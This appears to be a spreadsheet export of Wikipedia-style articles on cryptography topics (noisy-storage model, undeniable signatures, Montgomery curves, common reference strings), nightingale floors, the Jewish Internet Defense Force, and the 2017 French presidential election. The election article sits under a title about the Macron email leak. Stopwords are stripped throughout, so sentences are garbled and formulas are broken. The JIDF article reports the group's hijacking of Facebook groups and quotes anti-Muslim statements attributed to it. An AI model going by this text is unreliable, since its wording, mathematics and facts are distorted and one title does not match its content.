measuring immediately arrival. this advantage alice need quantum storage execute protocol. furthermore experimentally relatively easy create qubits, making possible implement protocols using currently available technology.the second step perform classical post-processing measurement data obtained step one. techniques used depend protocol question include privacy amplification, error-correcting codes, min-entropy sampling, interactive hashing. general demonstrate two-party cryptographic tasks implemented securely, common approach show simple cryptographic primitive implemented known universal secure function evaluation. that manages build protocol cryptographic primitive tasks implemented using primitive basic building block. primitive oblivious transfer. turn, oblivious transfer constructed even simpler building block known weak string erasure combination cryptographic techniques privacy amplification. protocols proposed date allow parties (alice) even unlimited amount noise-free quantum memory. i.e., noisy-storage assumption applied parties (bob). storage devices form {\displaystyle {\mathcal {f}}={\mathcal {n}}^{\otimes known two-party cryptographic task implemented securely means weak string erasure oblivious transfer whenever following conditions hold. bounded-quantum-storage (i.e., {\displaystyle {\mathcal {n}}={\mathsf {id}}} security achieved using protocol alice sends {\displaystyle n&gt;2n} bb84 encoded qubits. that security achieved alice sends twice number qubits store. also look bob's perspective security achieved store strictly less half qubits alice sent, i.e., {\displaystyle n&lt;n/2} bounded-quantum-storage using higher-dimensional memory cells (i.e., cell qubit, qudit), security achieved protocol alice sends {\displaystyle higher-dimensional qudits encoded possible mutually unbiased bases. limit large dimensions, security achieved whenever {\displaystyle n\gtrapprox that security always achieved long cannot store constant fraction transmitted signals. this optimal protocols considered since {\displaystyle n=n} dishonest store qudits sent alice. known whether possible using merely bb84 encoded qubits.for noisy-storage devices form {\displaystyle {\mathcal {f}}={\mathcal {n}}^{\otimes security achieved using protocol alice sends {\displaystyle bb84 encoded qubits {\displaystyle n&gt;2\cdot n\cdot c({\mathcal {n}})} {\displaystyle c({\mathcal {n}})} classical capacity quantum channel {\displaystyle {\mathcal {n}}} {\displaystyle {\mathcal {n}}} obeys so-called strong converse property, {\displaystyle n&gt;2\cdot n\cdot e_{c}({\mathcal {n}})} {\displaystyle e_{c}({\mathcal {n}})} entanglement cost quantum channel {\displaystyle {\mathcal {n}}} this generally much better condition classical capacity, however harder evaluate {\displaystyle e_{c}({\mathcal {n}})} .for noisy-storage devices form {\displaystyle {\mathcal {f}}={\mathcal {n}}^{\otimes security achieved using protocol alice sends {\displaystyle qubits encoded three mutually unbiased bases qubit, {\displaystyle n&gt;q({\mathcal {n}})n} {\displaystyle quantum capacity {\displaystyle {\mathcal {n}}} strong converse parameter {\displaystyle {\mathcal {n}}} small.the three mutually unbiased bases encodings six-state protocol quantum distribution. last condition form best known condition channels, quantum capacity well strong converse parameter generally easy determine. specific tasks using basic primitives building blocks always efficient solve cryptographic task. specialized protocols targeted solve specific problems generally efficient. examples known protocols commitment noisy-storage model, case bounded-quantum-storage oblivious transfer noisy-storage model, case bounded-quantum-storage secure identification bounded-quantum-storage model noisy-storage assumption bounded-quantum-storage also applied outside realm secure function evaluation. particular, shown eavesdropper quantum distribution memory bounded, higher error rates tolerated experimental implementation. also stephanie wehner references</t>
  </si>
  <si>
    <t>Undeniable signature</t>
  </si>
  <si>
    <t>undeniable signature digital signature scheme allows signer selective allow verify signatures. scheme adds explicit signature repudiation, preventing signer later refusing verify signature omission; situation would devalue signature eyes verifier. invented david chaum hans antwerpen 1989. overview scheme, signer possessing private publish signature message. however, signature reveals nothing recipient/verifier message signature without taking part either interactive protocols: confirmation protocol, confirms candidate valid signature message issued signer, identified public key. disavowal protocol, confirms candidate valid signature message issued signer.the motivation scheme allow signer choose signatures verified. however, signer might claim signature invalid later point, refusing take part verification, would devalue signatures verifiers. disavowal protocol distinguishes cases removing signer's plausible deniability. important confirmation disavowal exchanges transferable. they achieve property zero-knowledge; parties create transcripts confirmation disavowal indistinguishable, third-party, correct exchanges. designated verifier signature scheme improves upon deniable signatures allowing, signature, interactive portion scheme offloaded onto another party, designated verifier, reducing burden signer. zero-knowledge protocol following protocol suggested david chaum.a group, chosen discrete logarithm problem intractable, operation scheme take place group. commonly, finite cyclic group order contained z/nz, large prime number; group equipped group operation integer multiplication modulo arbitrary primitive element generator), chosen; computed powers combine obeying fixed axioms. alice generates pair, randomly chooses private key, derives publishes public key, message signing alice signs message, computing publishing signature, confirmation (i.e., avowal) protocol wishes verify signature, alice key, picks random numbers: uses blind message, sending alice: magb. alice picks random number, uses blind, signing using private key, sending bob: ands2 s1x. note (cgq)x (magb)xgqx (mx)a(gx)b+q zayb+q. reveals alice verifies correct blind values, then, reveals revealing blinds makes exchange zero knowledge. verifies cgq, proving chosen dishonestly, zayb+q, proving valid signature issued alice's key. note zayb+q (mx)a(gx)b+q.alice cheat step attempting randomly guess disavowal protocol alice wishes convince valid signature key, i.e., alice agreed integer, sets computational burden alice likelihood succeed chance. picks random values, ..., sends: msga zsya, exponentiating used blind sent values. note zsya (mx)s(gx)a v1x. alice, using private key, computes quotient, v1xv2−1 (msga)x(zsgxa)−1 msxz−s (mxz−1)s. thus, v1xv2−1 unless alice tests v1xv2−1 equality values: (mxz−1)i calculated repeated multiplication mxz−1 (rather exponentiating test succeeds, alice conjectures relevant otherwise, conjectures random value. where (mxz−1)i v1xv2−1 unrecoverable. alice commits picks random sends hash(r, bob. reveals alice confirms correct blind (i.e., generated using it), then, reveals revealing blinds makes exchange zero knowledge. checks hash(r, hash(r, proving alice knows hence mx.if alice attempts cheat step guessing random, probability succeeding 1/(k 1023 protocol conducted times, chances 2100. also non-repudiation designated verifier signature topics cryptography references</t>
  </si>
  <si>
    <t>Nightingale floor</t>
  </si>
  <si>
    <t>nightingale floors (鴬張り 鶯張り, uguisubari) listen floors make chirping sound walked upon. these floors used hallways temples palaces, famous example nijō castle, kyoto, japan. boards naturally creak pressure, floors built flooring nails jacket clamp, causing chirping noises. unclear design intentional. seems that, least initially, effect arose chance. information sign nijō castle states "the singing sound actually intentional, stemming rather movement nails clumps floor caused wear tear years". legend squeaking floors used security device, assuring none could sneak corridors undetected.the english name "nightingale" refers japanese bush warbler, uguisu, common songbird japan. etymology uguisu refers japanese bush warbler. latter segment bari (張り) comes haru (張る), meaning stretch". together means "the sound nightingale stretching/swelling/straining floor]". construction floors made dried boards. upside-down v-shaped joints move within boards pressure applied. examples following locations incorporate nightingale floors: nijō castle, kyoto chion-in, kyoto eikan-dō zenrin-ji, kyoto daikaku-ji, kyoto modern influences related topics melody road hokkaido, wakayama, gunma singing road anyanag, gyeonggi south korea civic musical road lancaster, california notes references animals. "uguisi" "animals". (2008). accessed november 2012. http://a-z-animals.com/animals/uguisu/. bunt, jonathan gillian hall, oxford beginner's japanese dictionary. york: oxford university press, 2000. henshall, kenneth guide remembering japanese characters. vermont: tuttle publishing company, 1998. japan-guide.com. "nijo castle (nihojo)" "kyoto travel: nijo castle" (june 2012). accessed november 2012. http://www.japan-guide.com/e/e3918.html. saiga-jp.com. "japanese kanji dictionary" "japanese learning" (march 2012). accessed november 2012. https://web.archive.org/web/20101029180930/http://www.saiga-jp.com/kanji_dictionary.html. zengarden.org. "nightingale floor, 'uguisu-bari' (2012). accessed september 2012. http://www.zen-garden.org/html/page_nightingalefloor.htm. external links information, photos video-clip nightingale floors kyoto travel: nijo castle</t>
  </si>
  <si>
    <t>Common reference string model</t>
  </si>
  <si>
    <t>cryptography, common reference string (crs) model captures assumption trusted setup involved parties access string taken distribution exists. schemes proven secure model secure given setup performed correctly. common reference string model generalization common random string model, uniform distribution strings. stated model equivalent reference string model public parameters model.the model applications study non-interactive zero-knowledge proofs universal composability. references</t>
  </si>
  <si>
    <t>Jewish Internet Defense Force</t>
  </si>
  <si>
    <t>jewish internet defense force (jidf) organization used social media mobilize support campaigns websites facebook groups promote praise described islamic terrorism antisemitism. group's website described jidf "private, independent, non-violent protest organization representing collective activists". jidf's work termed "hacktivism" haaretz. organization methods according jidf, organization "formed grassroots effort 2000, mount mass e-mail campaigns, response outbreak second intifada." website person identified "david appletree." according reporter jewish week 2009 "will true surname". article, appletree accused facebook administrators antisemitism closing account. facebook spokesperson replied account terminated website believe using real name, breach facebook's "real name culture". appletree went maintains approximately facebook groups focused combating terrorism antisemitism.a since deleted post groups website said "specifically target hateful material material blatantly promotes hatred violence, matter found." "about" page website says believe direct action eradicate problems face online create publicity cause companies like facebook google take needed action themselves." group focused attention websites like facebook, youtube, google earth, wikipedia. jidf redirected anti-israel facebook groups pages preferred changed names muslim members groups "mossad collaborator," among actions. website spokesman told israeli newspaper haaretz break laws jidf "prefers terms 'seize control,' 'take over' 'infiltrate' rather 'hack describe actions.'in interview arutz sheva, appletree maintained, "the main reason jidf exists promote israel fight hatred well islamic terrorist trends online," stated, grassroots organization reaches hearts minds normal, everyday jews israel supporters bamboozled supporting jewish establishment completely failed israel jewish people every imaginable." facebook during 2007, controversy facebook reported involving "the drop-down list places members show live". facebook group titled, "palestine country delist facebook country!", formed 2007 petitioned facebook management remove palestine facebook's list countries. several facebook groups formed support oppose removal including "israel country! delist facebook country". matt hicks facebook responded saying: long groups meet terms use, stay encourage users report anything racist objectionable." jidf claimed "israel country" group antisemitic mobilized supporters complain facebook effort deleted. after facebook refused shut group down, jidf said somehow took control group july 2008.according november 2008 article haaretz, jidf forwarded lists facebook groups deemed promoted hatred violence website's administrators, hoping would removed. according named "david" quoted haaretz article, facebook either nothing waited months taking action. "david" told haaretz group decided technically "intercept facebook groups make impossible access." jidf particularly upset facebook groups praising shooting students jerusalem's mercaz harav yeshiva march 2008.in july 2009, jidf dichter took credit successfully pressuring facebook removing page hizbullah leader hassan nasrallah. jidf said mobilized supporters complain page facebook's owners. jidf website claims deleted vast majority pro-hezbollah page's 118,000 members. jidf sites says removed antisemitic groups facebook, september 2009 hijacked facebook group titled "eliminate israel being" deleted 5,000 members facebook management "returned control site administrators."the jidf criticized facebook allegedly condoning hosting holocaust denial groups network. group charged facebook hypocritical removing groups support klux klan, instance, removing considers holocaust denial groups claimed would continue criticize facebook matter. elsewhere jidf's measures "include reporting wikipedia editors claims anti-israel, taking action entries seen including one-sided false accounts history israel mideast conflict," haaretz wrote. group sought palestinian villages listed destroyed foundation israel removed google earth campaigned description "palestine" country.the jidf organized pro-gilad shalit campaign 2009 social networking site twitter. during "tweet4shalit" campaign twitter users drove gilad shalit name second highest trend 23rd birthday. tweets shalit ranged demand "free shalit" requests international supervision case.the jidf recognized "100 most influential jewish twitterers" ranked top-ranked jewish newswire. criticism october 2008, german newspaper frankfurter allgemeine zeitung (faz) wrote "the jidf follows open political agenda well. many members protested clearing israeli settlements gaza strip 2005 regard policy trading land peace wrong." newspaper wrote "ultimately jidf also wants propagate ‘jewish values internet’. this leads self-appointed warriors online-hatred link homepage dubious site named ‘thereligionofpeace.com’. jidf website said "mohammed genocidal pedophile murdered people think like did, believe things believed. millions muslims promote idea "insult" (despite fact he's dead), killed." website said mohammad "false prophet" "islamic ideology clearly hatred violence, declaring entire non-islamic world... determined dominate world, nazism was." website came plans build islamic cultural center near ground zero york, "because islam hateful violent ideology preaches hate violence non-muslims (especially jews, obsessed dehumanizes apes pigs), mosques. islam, nazism. just wish nazi institutions springing everywhere, need islamic one's springing everywhere, either."in 2009, wrote jidf "sometimes guilty sweeping generalizations own", citing 2008 interview published facebook critic brian cuban's site jidf representative discussed "the issues surrounding [then-candidate barack obama's] terrorist connections well racist anti-semitic church, supported hamas rev. louis farrakhan", reply asked jewish muslim communities jidf, "99.9% muslims hate us". quoted jidf spokesperson saying would rather people focus specific quotations interview "informal" cuban "would correct statements quickly answered help meet deadline." asked cuban interview, "what position jidf 'palestinian question' regarding disputes occupied lands", spokesman replied, "palestinians transferred israeli territories. they live many arab states. land concessions enemies. release terrorist prisoners israeli prisons. arming funding enemies negotiation them. morals, ethics common sense feel israel must truly 'light unto nations' order world safe feel israel truly front lines islam declared upon us." also public diplomacy israel internet activism internet haganah honestreporting committee accuracy middle east reporting america references external links official website</t>
  </si>
  <si>
    <t>Montgomery curve</t>
  </si>
  <si>
    <t>mathematics montgomery curve form elliptic curve introduced peter montgomery 1987, different usual weierstrass form. used certain computations, particular different cryptography applications. definition montgomery curve field defined equation {\displaystyle m_{a,b}:by^{2}=x^{3}+ax^{2}+x} certain b(a2 generally curve considered finite field (for example, finite field elements, characteristic different also considered rationals restrictions montgomery arithmetic possible "operations" points elliptic curve: "adding" points {\displaystyle p,q} consists finding third {\displaystyle {\displaystyle r=p+q} "doubling" point consists computing {\displaystyle [2]p=p+p} (for information operations group law) below. point {\displaystyle p=(x,y)} elliptic curve montgomery form {\displaystyle by^{2}=x^{3}+ax^{2}+x} represented montgomery coordinates {\displaystyle p=(x:z)} {\displaystyle p=(x:z)} projective coordinates {\displaystyle x=x/z} {\displaystyle z\neq notice kind representation point loses information: indeed, case, distinction affine points {\displaystyle (x,y)} {\displaystyle (x,-y)} given point {\displaystyle (x:z)} however, representation possible obtain multiples points, given {\displaystyle p=(x:z)} compute {\displaystyle [n]p=(x_{n}:z_{n})} now, considering points {\displaystyle p_{n}=[n]p=(x_{n}:z_{n})} {\displaystyle p_{m}=[m]p=(x_{m}:z_{m})} given point {\displaystyle p_{m+n}=p_{m}+p_{n}=(x_{m+n}:z_{m+n})} whose coordinates are: {\displaystyle x_{m+n}=z_{m-n}((x_{m}-z_{m})(x_{n}+z_{n})+(x_{m}+z_{m})(x_{n}-z_{n}))^{2}} {\displaystyle z_{m+n}=x_{m-n}((x_{m}-z_{m})(x_{n}+z_{n})-(x_{m}+z_{m})(x_{n}-z_{n}))^{2}} {\displaystyle m=n} operation becomes "doubling"; coordinates {\displaystyle [2]p_{n}=p_{n}+p_{n}=p_{2n}=(x_{2n}:z_{2n})} given following equations: {\displaystyle 4x_{n}z_{n}=(x_{n}+z_{n})^{2}-(x_{n}-z_{n})^{2}} {\displaystyle x_{2n}=(x_{n}+z_{n})^{2}(x_{n}-z_{n})^{2}} {\displaystyle z_{2n}=(4x_{n}z_{n})((x_{n}-z_{n})^{2}+((a+2)/4)(4x_{n}z_{n}))} first operation considered (addition) time-cost 3m+2s, denotes multiplication general elements field elliptic curve defined, denotes squaring general element field. second operation (doubling) time-cost denotes multiplication general element constant; notice constant {\displaystyle (a+2)/4} {\displaystyle chosen order small algorithm example following algorithm represents doubling point {\displaystyle p_{1}=(x_{1}:z_{1})} elliptic curve montgomery form. assumed {\displaystyle z_{1}=1} cost implementation 3add 1*4. here denotes multiplications required, indicates squarings, refers multiplication {\displaystyle xx_{1}=x_{1}^{2}\,} {\displaystyle x_{2}=(xx_{1}-1)^{2}\,} {\displaystyle z_{2}=4x_{1}(xx_{1}+ax_{1}+1)\,} example {\displaystyle p_{1}=(2,{\sqrt {3}})} point curve {\displaystyle 2y^{2}=x^{3}-x^{2}+x} coordinates {\displaystyle (x_{1}:z_{1})} {\displaystyle x_{1}=x_{1}/z_{1}} {\displaystyle p_{1}=(2:1)} then: {\displaystyle xx_{1}=x_{1}^{2}=4\,} {\displaystyle x_{2}=(xx_{1}-1)^{2}=9\,} {\displaystyle z_{2}=4x_{1}(xx_{1}+ax_{1}+1)=24\,} result point {\displaystyle p_{2}=(x_{2}:z_{2})=(9:24)} {\displaystyle p_{2}=2p_{1}} addition given points {\displaystyle p_{1}=(x_{1},y_{1})} {\displaystyle p_{2}=(x_{2},y_{2})} montgomery curve {\displaystyle m_{a,b}} affine coordinates, point {\displaystyle p_{3}=p_{1}+p_{2}} represents, geometrically third point intersection {\displaystyle m_{a,b}} line passing {\displaystyle p_{1}} {\displaystyle p_{2}} possible find coordinates {\displaystyle (x_{3},y_{3})} {\displaystyle p_{3}} following way: consider generic line {\displaystyle ~y=lx+m} affine plane pass {\displaystyle p_{1}} {\displaystyle p_{2}} (impose condition), way, obtains {\displaystyle l={\frac {y_{2}-y_{1}}{x_{2}-x_{1}}}} {\displaystyle m=y_{1}-\left({\frac {y_{2}-y_{1}}{x_{2}-x_{1}}}\right)x_{1}} intersect line curve {\displaystyle m_{a,b}} substituting {\displaystyle variable curve equation {\displaystyle ~y=lx+m} following equation third degree obtained: {\displaystyle x^{3}+(a-bl^{2})x^{2}+(1-2blm)x-bm^{2}=0.} observed before, equation three solutions correspond {\displaystyle coordinates {\displaystyle p_{1}} {\displaystyle p_{2}} {\displaystyle p_{3}} particular equation re-written {\displaystyle (x-x_{1})(x-x_{2})(x-x_{3})=0} comparing coefficients identical equations given above, particular coefficients terms second degree, gets: {\displaystyle -x_{1}-x_{2}-x_{3}=a-bl^{2}} .so, {\displaystyle x_{3}} written terms {\displaystyle x_{1}} {\displaystyle y_{1}} {\displaystyle x_{2}} {\displaystyle y_{2}} {\displaystyle x_{3}=b\left({\frac {y_{2}-y_{1}}{x_{2}-x_{1}}}\right)^{2}-a-x_{1}-x_{2}.} find {\displaystyle coordinate point {\displaystyle p_{3}} sufficient substitute value {\displaystyle x_{3}} line {\displaystyle ~y=lx+m} notice give point {\displaystyle p_{3}} directly. indeed, method find coordinates point {\displaystyle {\displaystyle r+p_{1}+p_{2}=p_{\infty needs resulting point {\displaystyle p_{1}} {\displaystyle p_{2}} necessary observe that: {\displaystyle r+p_{1}+p_{2}=p_{\infty {\displaystyle -r=p_{1}+p_{2}} given point {\displaystyle necessary find {\displaystyle ~-r} done easily changing sign {\displaystyle coordinate {\displaystyle words, necessary change sign {\displaystyle coordinate obtained substituting value {\displaystyle x_{3}} equation line. resuming, coordinates point {\displaystyle p_{3}=(x_{3},y_{3})} {\displaystyle p_{3}=p_{1}+p_{2}} are: {\displaystyle x_{3}={\frac {b(y_{2}-y_{1})^{2}}{(x_{2}-x_{1})^{2}}}-a-x_{1}-x_{2}} {\displaystyle y_{3}={\frac {(2x_{1}+x_{2}+a)(y_{2}-y_{1})}{x_{2}-x_{1}}}-{\frac {b(y_{2}-y_{1})^{3}}{(x_{2}-x_{1})^{3}}}-y_{1}} doubling given point {\displaystyle p_{1}} montgomery curve {\displaystyle m_{a,b}} point {\displaystyle [2]p_{1}} represents geometrically third point intersection curve line tangent {\displaystyle p_{1}} find coordinates point {\displaystyle p_{3}=2p_{1}} sufficient follow method given addition formula; however, case, line tangent curve {\displaystyle p_{1}} {\displaystyle m_{a,b}:f(x,y)=0} {\displaystyle f(x,y)=x^{3}+ax^{2}+x-by^{2},} value represents slope line, given {\displaystyle l=-\left.{\frac {\partial f}{\partial x}}\right/{\frac {\partial f}{\partial y}}} implicit function theorem. {\displaystyle l={\frac {3x_{1}^{2}+2ax_{1}+1}{2by_{1}}}} coordinates point {\displaystyle p_{3}} {\displaystyle p_{3}=2p_{1}} are: {\displaystyle {\begin{aligned}x_{3}&amp;=bl^{2}-a-x_{1}-x_{1}={\frac {b(3x_{1}^{2}+2ax_{1}+1)^{2}}{(2by_{1})^{2}}}-a-x_{1}-x_{1}\\y_{3}&amp;=(2x_{1}+x_{1}+a)l-bl^{3}-y_{1}\\&amp;={\frac {(2x_{1}+x_{1}+a)(3{x_{1}}^{2}+2ax_{1}+1)}{2by_{1}}}-{\frac {b(3{x_{1}}^{2}+2ax_{1}+1)^{3}}{(2by_{1})^{3}}}-y_{1}.\end{aligned}}} equivalence twisted edwards curves {\displaystyle field characteristic different {\displaystyle m_{a,b}} elliptic curve montgomery form: {\displaystyle m_{a,b}:bv^{2}=u^{3}+au^{2}+u} {\displaystyle a\in k\smallsetminus \{-2,2\}} {\displaystyle b\in k\smallsetminus \{0\}} {\displaystyle e_{a,d}} elliptic curve twisted edwards form: {\displaystyle e_{a,d}\ ax^{2}+y^{2}=1+dx^{2}y^{2},\,} {\displaystyle a,d\in k\smallsetminus \{0\},\quad a\neq following theorem shows birational equivalence montgomery curves twisted edwards curve:theorem every twisted edwards curve birationally equivalent montgomery curve {\displaystyle particular, twisted edwards curve {\displaystyle e_{a,d}} birationally equivalent montgomery curve {\displaystyle m_{a,b}} {\displaystyle a={\frac {2(a+d)}{a-d}}} {\displaystyle b={\frac {4}{a-d}}} map: {\displaystyle \psi \,:\,e_{a,d}\rightarrow m_{a,b}} {\displaystyle (x,y)\mapsto (u,v)=\left({\frac {1+y}{1-y}},{\frac {1+y}{(1-y)x}}\right)} birational equivalence {\displaystyle e_{a,d}} {\displaystyle m_{a,b}} inverse: {\displaystyle \psi ^{-1}} {\displaystyle m_{a,b}\rightarrow e_{a,d}} {\displaystyle (u,v)\mapsto (x,y)=\left({\frac {u}{v}},{\frac {u-1}{u+1}}\right),a={\frac {a+2}{b}},d={\frac {a-2}{b}}} notice equivalence curves valid everywhere: indeed {\displaystyle \psi defined points {\displaystyle v=0} {\displaystyle u+1=0} {\displaystyle m_{a,b}} equivalence weierstrass curves elliptic curve written weierstrass form. particular, elliptic curve montgomery form {\displaystyle m_{a,b}} {\displaystyle by^{2}=x^{3}+ax^{2}+x,} transformed following way: divide term equation {\displaystyle m_{a,b}} {\displaystyle b^{3}} substitute variables {\displaystyle u={\frac {x}{b}}} {\displaystyle v={\frac {y}{b}}} respectively, equation {\displaystyle v^{2}=u^{3}+{\frac {a}{b}}u^{2}+{\frac {1}{b^{2}}}u.} obtain short weierstrass form here, sufficient replace variable {\displaystyle t-{\frac {a}{3b}}} {\displaystyle v^{2}=\left(t-{\frac {a}{3b}}\right)^{3}+{\frac {a}{b}}\left(t-{\frac {a}{3b}}\right)^{2}+{\frac {1}{b^{2}}}\left(t-{\frac {a}{3b}}\right);} finally, gives equation: {\displaystyle v^{2}=t^{3}+\left({\frac {3-a^{2}}{3b^{2}}}\right)t+\left({\frac {2a^{3}-9a}{27b^{3}}}\right).} hence mapping given {\displaystyle \psi {\displaystyle m_{a,b}\rightarrow e_{a,b}} {\displaystyle (x,y)\mapsto (t,v)=\left({\frac {x}{b}}+{\frac {a}{3b}},{\frac {y}{b}}\right),a={\frac {3-a^{2}}{3b^{2}}},b={\frac {2a^{3}-9a}{27b^{3}}}} contrast, elliptic curve base field {\displaystyle \mathbb weierstrass form {\displaystyle e_{a,b}} {\displaystyle v^{2}=t^{3}+at+b} converted montgomery form {\displaystyle e_{a,b}} order divisible four satisfies following conditions: {\displaystyle z^{3}+az+b=0} least root {\displaystyle \alpha \mathbb {\displaystyle 3\alpha ^{2}+a} quadratic residue {\displaystyle \mathbb .when conditions satisfied, {\displaystyle s=({\sqrt {3\alpha ^{2}+a}})^{-1}} mapping {\displaystyle \psi ^{-1}} {\displaystyle e_{a,b}\rightarrow m_{a,b}} {\displaystyle (t,v)\mapsto (x,y)=\left(s(t-\alpha ),sv\right),a=3\alpha s,b=s} also curve25519 table costs operations elliptic curves information running-time required specific case notes references peter montgomery (1987). "speeding pollard elliptic curve methods factorization". mathematics computation. (177): 243–264. doi:10.2307/2007888. jstor 2007888. daniel bernstein, peter birkner, marc joye, tanja lange christiane peters (2008). "twisted edwards curves". progress cryptology africacrypt 2008. lecture notes computer science. vol. 5023. springer-verlag berlin heidelberg. 389–405. doi:10.1007/978-3-540-68164-9_26. isbn 978-3-540-68159-5.{{cite book}}: maint: multiple names: authors list (link) wouter castryck; steven galbraith; reza rezaeian farashahi (2008). "efficient arithmetic elliptic curves using mixed edwards-montgomery representation" (pdf). {{cite journal}}: cite journal requires |journal= (help) external links genus-1 curves large-characteristic fields</t>
  </si>
  <si>
    <t>2017 Emmanuel Macron Emails leak</t>
  </si>
  <si>
    <t>2017 french presidential election held april 2017. candidate majority first round, runoff held candidates, emmanuel macron marche! (em) marine national front (fn), macron decisive margin. presidential election followed legislative election elect members national assembly june. incumbent president françois hollande socialist party (ps) eligible second term, declared december 2016 would seek reelection light approval ratings, making first incumbent head state fifth republic seek reelection. françois fillon republicans (lr)—after winning party's first open primary—and national front first-round opinion polls november 2016 mid-january 2017. polls tightened considerably late january; publication revelations fillon employed family members possibly fictitious jobs series politico-financial affairs came colloquially known "penelopegate", macron overtook fillon place consistently second first-round polling. time, benoît hamon socialist primary, entering fourth place polls. after strong debate performances, jean-luc mélenchon france insoumise (fi) rose significantly polls late march, overtaking hamon place fillon. first round held state emergency declared following november 2015 paris attacks. following result first round, macron continued runoff. first time since 2002 national front candidate continued second round first time history fifth republic runoff include nominee traditional left right parties; combined share vote eligible voters, approximately 26%, also historic low.estimations result second round indicated macron elected decisive margin; immediately conceded defeat. after interior ministry published preliminary results, official result second round proclaimed constitutional council may. overall, 43.6% registered electorate voted macron; 2002, contrast, two-thirds eligible voters voted then-fn candidate jean-marie pen. when macron took office may, became youngest holder presidency french history youngest french head state since napoleon. named édouard philippe prime minister next day. initial government assembled may; legislative election june gave marche! substantial majority. background president french republic french co-prince andorra elected five-year term two-round election article constitution: candidate secures absolute majority votes first round, second round held weeks later candidates received votes. 2017, first second rounds held april may.each presidential candidate must meet specific requirements order run. they must french citizen least years old. also necessary candidates electoral roll, proving eligibility vote. listed first-round ballot, candidates must secure signatures (often referred parrainages) national local elected officials least different departments overseas collectivities, tenth signatories single department. official signature collection period followed publication journal officiel february march. collection period initially scheduled begin february, visit prime minister bernard cazeneuve china date forced delay. french prefectures mailed sponsorship forms 42,000 elected officials eligible give signature candidate, must delivered constitutional council validation. unlike previous years, list validated signatures posted tuesday thursday every week council's website; past, signatories published official candidate list verified collection period. signature collection period also marked deadline declaration personal assets required prospective candidates. final list candidates declared march.the conseil supérieur l'audiovisuel (csa) ensured candidates receive equal time broadcast media "under comparable programming conditions" march onward. warned march amount speaking time broadcasters given fillon supporters "unusually high", even given unusual circumstances surrounding candidacy. after official start campaign april, strictly enforced equal time broadcast media. campaigning first round election ended midnight april, days vote. constitutional council verified results first round 24–26 april officially certified vote tallies april, procedure used second round. president french republic proclaimed undergo investiture ceremony latest. candidates march 2017, constitutional council published names candidates received valid sponsorships, order list determined drawing lots. sponsorships candidate must secure signatures elected officials order appear first-round ballot, signature collection period ending march. table lists sponsorships received constitutional council candidate. colour legend non-candidates socialist party (ps) 2017 presidential election first history fifth republic sitting president seek second term. december 2016, incumbent president françois hollande, acknowledging approval ratings, announced would seek second term. then-prime minister manuel valls declared december 2016 would socialist primary january 2017, defeated benoît hamon second round january. democratic movement (modem) françois bayrou, three-time centrist presidential candidate leader democratic movement (modem) came fourth 2002, third 2007, fifth 2012 initially supported candidacy alain juppé primary right long-time adversary nicolas sarkozy, vowed primary. however, fillon's victory primary elimination sarkozy first round defeat juppé runoff bayrou reconsider lodging presidency, despite 2014 election promise successful mayoral campaign would seek presidency won. after extended period suspense, finally announced february would fourth time, instead proposing conditional alliance emmanuel macron, accepted offer. europe ecology greens (eelv) july 2016, europe ecology greens (eelv) announced would hold primary election 2017 presidential election. those wishing nominated required support "federal councilors" 240; nominations open individuals civic society well. vote open party members well sympathizers could register vote primary. announcement came days prominent environmentalist nicolas hulot's surprise declaration would offer presidential candidate july. eelv first party hold presidential primary 2017 election, rounds held october november 2016. contested deputy, former minister territorial equality housing, ex-party leader cécile duflot, well three meps karima delli, yannick jadot, michèle rivasi. duflot considered early favorite, though initially opposed holding primary, aware risk might lose highlighted experience government. main proposal incorporate fight climate change constitution. jadot perceived main challenger; elected 2009, worked greenpeace france 2002 2008, specializing transatlantic trade climate issues. with thomas piketty daniel cohn-bendit, sought "primary left", failed materialize. rejected "candidacy awaited political-media world" duflot, among others represented anti-duflot force party's right wing. rivasi barely managed qualify primary, earlier lacking necessary sponsorships. like jadot, represented radical wing party albeit left flank served deputy drôme 1997 2002 greenpeace france 2003 2004. delli, daughter algerian immigrants, first became involved politics part collective movements, sought become 2009 stint parliamentary assistant marie-christine blandin. also party's left-wing, declared would defend "popular ecology".jadot rivasi advanced runoff scoring 35.61% 30.16%, respectively, first round; candidates eliminated, duflot garnering 24.41% delli 9.82%. jadot second round primary november, obtaining 54.25% vote rivasi's 40.75%, becoming nominee eelv presidential election. jadot, claimed sponsorships opening collection period, withdrew candidacy february endorsed hamon, pair agreed common platform. online vote among eelv primary voters february required confirm agreement; earlier vote open talks hamon mélenchon approved 89.7% electors. hamon–jadot alliance consummated february; among cast vote, 79.53% voted support 15.39% opposed 5.08% submitting blank ballots, overall voter turnout 55.25% (9,433 votes). this marks first election since 1969 without green candidate. primaries republicans (lr) after loss nominee union popular movement (ump) 2012 presidential election, ex-president nicolas sarkozy pledged return "frenchman among french". however, announced september 2014 would seek presidency party, position secured online vote november online vote backing 64.50% party members, main opponent bruno maire's 29.18%. succeeded triumvirate alain juppé, françois fillon, jean-pierre raffarin, assumed party's leadership resignation jean-françois copé. sarkozy initially reluctant accept idea holding right-wing primary 2017 presidential election, september 2014 declared support primary right warning juppé, august made public intention nomination.the rules primary confirmed april 2015, scheduling first round open primary november 2016, runoff november candidate received vote. those wishing vote required ballot sign charter indicating adherence "republican values right centre". order appear ballot, prospective candidates needed present sponsorships elected officials least departments, tenth department, including least parliamentarians, addition signatures least 2,500 party members across least departments, tenth department. charter permitted parties wishing participate sponsorship requirements. high authority ultimately determined seven candidates qualified compete open primary right centre: fillon, juppé, maire, copé, sarkozy, nathalie kosciusko-morizet republicans, party's name 2015, well jean-frédéric poisson christian democratic party (pcd), required present signatures leader another party. national centre independents peasants (cnip) also allowed participate, present candidate. primary initially fought primarily juppé sarkozy, candidates primary polls. sarkozy's program emphasized themes islam, immigration, security, defense. proposed family reunifications reform right birthright citizenship, halt flow economic migrants, increase residence requirements secure french nationality. reaffirmed interest "assimilation" immigrants, intended menus school canteens (i.e., options muslim students) well muslim headscarves universities. sarkozy also suggested radical imams expelled suspected terrorists detained authorities tried special anti-terrorist court, addition reduction criminal responsibility proposed postpone increase retirement 2024, permit exemptions 35-hour workweek, 300,000 civil service jobs increasing working hours week, abolish wealth (isf). like maire, rule possibility referendum european union (eu). also sought european treaty "refounding", creation european monetary fund, commit defense spending 2025, reduce public spending €100 billion taxes billion reducing budget deficit gdp.in contrast sarkozy, juppé spoke "happy identity" emphasized importance integration opposed assimilation. supported drawing common list "safe countries" differentiate refugees economic migrants, setting "quota" immigrants necessary, stop providing foreign countries refusing comply obligation accept deported citizens. questioned sarkozy's proposals schengen instead merely acknowledged functioning correctly, concurred exempting acquisition french nationality foreigners previously convicted. juppé also 